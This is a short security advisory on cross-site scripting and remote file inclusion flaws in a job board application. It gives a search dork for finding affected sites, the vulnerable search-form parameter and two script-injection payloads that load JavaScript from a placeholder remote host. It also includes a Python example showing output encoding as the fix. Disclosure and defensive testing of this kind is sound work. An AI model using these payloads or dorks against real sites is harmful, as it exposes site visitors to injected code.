All versions of Job Board Software suffer from cross-site scripting and remote file inclusion vulnerabilities.
+=============================================================================+
+ Job Board Software ALL Versions XSS & RFI Multiple Remote Vulnerabilities +
+=============================================================================+
Author(s): Ivan Sanchez & Maximiliano Soler.
Product: Job Board Software.
Web: https://www.beyond.com/
Versions: ALL Versions Copyright 2001-2008 Beyond.com.
Date: 11/02/2008
GOOGLE DORKS:
------------
[+] inurl:"/JS/Form/SearchForm.asp"
EXPLOIT:
--------
https://www.[DOMAIN].tld/JS/Form/SearchForm.asp
External field name (form label): Keyword Type
Internal variable name (form parameter): FKeywords
[1]- Example form:
Keyword Type = "><script src=https://DOMAIN/scripts/exploit-code.js></script>
[2]- Tampering Attack:
FKeywords="><script src=https://DOMAIN/exploit.js></script>
[3]- More XSS / RFI found in this application.
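
Added example, not part of the advisory or the vendor's code: the `">` prefix in both payloads suggests the keyword value is reflected inside a quoted HTML attribute. The `<input>` markup below is an assumed stand-in for the SearchForm.asp output; the sketch renders the advisory's payload with and without output encoding and parses the result to show which elements a browser would see (classic ASP offers `Server.HTMLEncode` for the same purpose).

```python
import html
from html.parser import HTMLParser

# Payload quoted in the advisory (DOMAIN is the advisory's own placeholder).
PAYLOAD = '"><script src=https://DOMAIN/exploit.js></script>'

def render_vulnerable(fkeywords: str) -> str:
    """Assumed 'before' behaviour: the value is written into the attribute as-is."""
    return '<input type="text" name="FKeywords" value="' + fkeywords + '">'

def render_hardened(fkeywords: str) -> str:
    """Encode &, <, >, " and ' so the value cannot close the attribute or the tag."""
    encoded = html.escape(fkeywords, quote=True)
    return '<input type="text" name="FKeywords" value="' + encoded + '">'

class _Audit(HTMLParser):
    """Records the start tags an HTML parser sees and the FKeywords field value."""
    def __init__(self):
        super().__init__()
        self.tags = []
        self.field_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        attrs = dict(attrs)
        if tag == "input" and attrs.get("name") == "FKeywords":
            self.field_value = attrs.get("value")

def audit(markup: str):
    """Return (start tags in order, decoded FKeywords value) for an HTML fragment."""
    parser = _Audit()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.field_value

if __name__ == "__main__":
    for render in (render_vulnerable, render_hardened):
        tags, value = audit(render(PAYLOAD))
        print(render.__name__, tags, repr(value))
```

With encoding applied, the parser sees a single `input` element whose value is the literal search text, so the same `audit` check can serve as a regression test for any page that reflects the parameter.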
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
--
Maximiliano Soler.
Reports & Review Code.
Null Code Services.
www.nullcode.com.ar